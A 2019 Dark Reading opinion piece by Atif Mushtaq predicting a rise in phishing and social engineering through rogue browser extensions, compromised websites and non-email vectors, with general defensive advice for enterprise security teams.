Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

Endpoint Security

1/2/2019
09:15 AM
Atif Mushtaq
Atif Mushtaq
News Analysis-Security Now
50%
50%

Phishing & Social Engineering Attacks Will Rise in 2019

The rise of fileless attack techniques and other developments is making phishing a much more serious problem for enterprise security. As we head into 2019, a new approach is needed.

The cybersecurity field has made great strides in recent years through improvements to email and web security solutions, next-gen antivirus solutions and overall network, operating system and browser hardening.

In turn, threat actors have changed their strategies by adopting hard-to-detect, fileless phishing attacks that exploit the more vulnerable human attack surface. (See New Worm Helps Spread Fileless Version of Bladabindi RAT .)

The threat landscape for 2019 is evolving due to new types of phishing and social engineering attack vectors and methods. These threats are rapidly morphing beyond phishing emails with malicious attachments to penetrate organizations through browser-based attack vectors designed to trick users into divulging sensitive information or install man-in-the-browser snoopware to run stealthily in browser memory.

In short, CSOs and security managers must focus attention on the growing number of threats that leverage malicious sites, regardless of phishing attack vector.

In 2019, cybercriminals will continue to use phishing emails, though the percentage of emails that include malicious attachments will decline as those with malicious links continue to increase. In addition, use of phishing attack vectors beyond email will expand. These vectors include phishing through ads, pop-ups, social media and chat applications. Hackers are also building seemingly legitimate browser extensions that provide useful functionality.

However, these rogue extensions can also act as snoopware to surreptitiously capture credentials that enable additional attacks on the machine or the corporate network.

The battlefield is shifting to compromised websitesWith anti-phishing solutions becoming more adept at spotting newly registered or otherwise suspicious domains, attackers are expanding their use of normally benign but compromised websites to host their malicious phishing pages. This helps them avoid detection and blocking by URL filtration systems and web isolation technologies.

An ecosystem of bad actors is emerging to support this activity. Our threat researchers have noticed a growing number of benign website login credentials for sale on the Dark Web. (See Watch Out: The Dark Web Is Really Watching You.)

Let's be clear -- the concern is not about the browser itself becoming exploited through a software vulnerability.

The most popular browsers are being made more secure all the time. The real issue involves a wider variety of ways that users are tricked into adding malicious browser extensions that can lead to bad outcomes or clicking a link that silently installs snoopware in browser memory.

Most security teams are aware of these new threats, but they are unclear on how to respond. Firewalls are only effective when there is a known malicious URL to block, but the hackers have become skillful at quickly propping up new unidentified web pages, and also using compromised legitimate sites and then shutting phishing pages down again within hours to avoid detection.

By the time they are typically discovered and blocked, the attacks are already done and have moved on. This has given rise to more anti-phishing technologies that can do real-time as well as pre-emptive phishing site detection.

Fresh approaches to thwarting phishingCybercriminals are increasingly turning to social engineering attacks that exploit the human attack surface to evade existing safeguards and gain entry to corporate networks.

These new threats don't directly target the device, the software or the network. The primary target is the employee behind the browser. In other words, the most vulnerable link in the chain is the end user. With more than 4 billion Internet users who own a few connected devices each, and with web usage increasingly common for everyday business tasks, the expansive scope of this problem becomes all too clear.

Security teams will need to deploy new tools and strategies to block phishing threats on the web, before users get duped into doing things that compromise their organizations. On-going phishing awareness training for employees should be a part of any layered security strategy, as should anti-phishing solutions that can detect and help block live web-based phishing threats.

Clearly, this is an on-going game of cat-and-mouse with 2019 promising to bring even more sophisticated phishing attacks to manipulate users. As Google and other browser makers crack down on rogue browser extensions and apps, rogue extension makers will devise new ways to avoid detection. (See Google Chrome 71: Bugs Squashed & New Ways to Block 'Abusive Experiences'.)

With so much sensitive information being passed through the browser via cloud-based apps and cloud storage systems, tricking users and getting man-in-the-browser for snooping is just too tempting a target for cybercriminals.

Related posts:

Atif Mushtaq has spent most of his career on the front lines of the war against cybercrime. Before founding SlashNext, he spent nine years as a senior scientist at FireEye, where he was one of the main architects of FireEye's core malware detection system. Mushtaq has worked with law enforcement and other global agencies to take down some of the world’s biggest malware networks.

Comment  | 
Print  | 
More Insights
Comments
Oldest First  |  Newest First  |  Threaded View
COVID-19: Latest Security News & Commentary
Dark Reading Staff 10/27/2020
Are You One COVID-19 Test Away From a Cybersecurity Disaster?
Alan Brill, Senior Managing Director, Cyber Risk Practice, Kroll,  10/21/2020
Botnet Infects Hundreds of Thousands of Websites
Robert Lemos, Contributing Writer,  10/22/2020
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Special Report: Computing's New Normal
This special report examines how IT security organizations have adapted to the "new normal" of computing and what the long-term effects will be. Read it and get a unique set of perspectives on issues ranging from new threats & vulnerabilities as a result of remote working to how enterprise security strategy will be affected long term.
Flash Poll
How IT Security Organizations are Attacking the Cybersecurity Problem
How IT Security Organizations are Attacking the Cybersecurity Problem
The COVID-19 pandemic turned the world -- and enterprise computing -- on end. Here's a look at how cybersecurity teams are retrenching their defense strategies, rebuilding their teams, and selecting new technologies to stop the oncoming rise of online attacks.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2020-8260
PUBLISHED: 2020-10-28
A vulnerability in the Pulse Connect Secure < 9.1R9 admin web interface could allow an authenticated attacker to perform an arbitrary code execution using uncontrolled gzip extraction.
CVE-2020-8261
PUBLISHED: 2020-10-28
A vulnerability in the Pulse Connect Secure / Pulse Policy Secure < 9.1R9 is vulnerable to arbitrary cookie injection.
CVE-2020-8262
PUBLISHED: 2020-10-28
A vulnerability in the Pulse Connect Secure / Pulse Policy Secure below 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) and Open Redirection for authenticated user web interface.
CVE-2020-8263
PUBLISHED: 2020-10-28
A vulnerability in the authenticated user web interface of Pulse Connect Secure < 9.1R9 could allow attackers to conduct Cross-Site Scripting (XSS) through the CGI file.
CVE-2020-8239
PUBLISHED: 2020-10-28
A vulnerability in the Pulse Secure Desktop Client < 9.1R9 is vulnerable to the client registry privilege escalation attack. This fix also requires Server Side Upgrade due to Standalone Host Checker Client (Windows) and Windows PDC.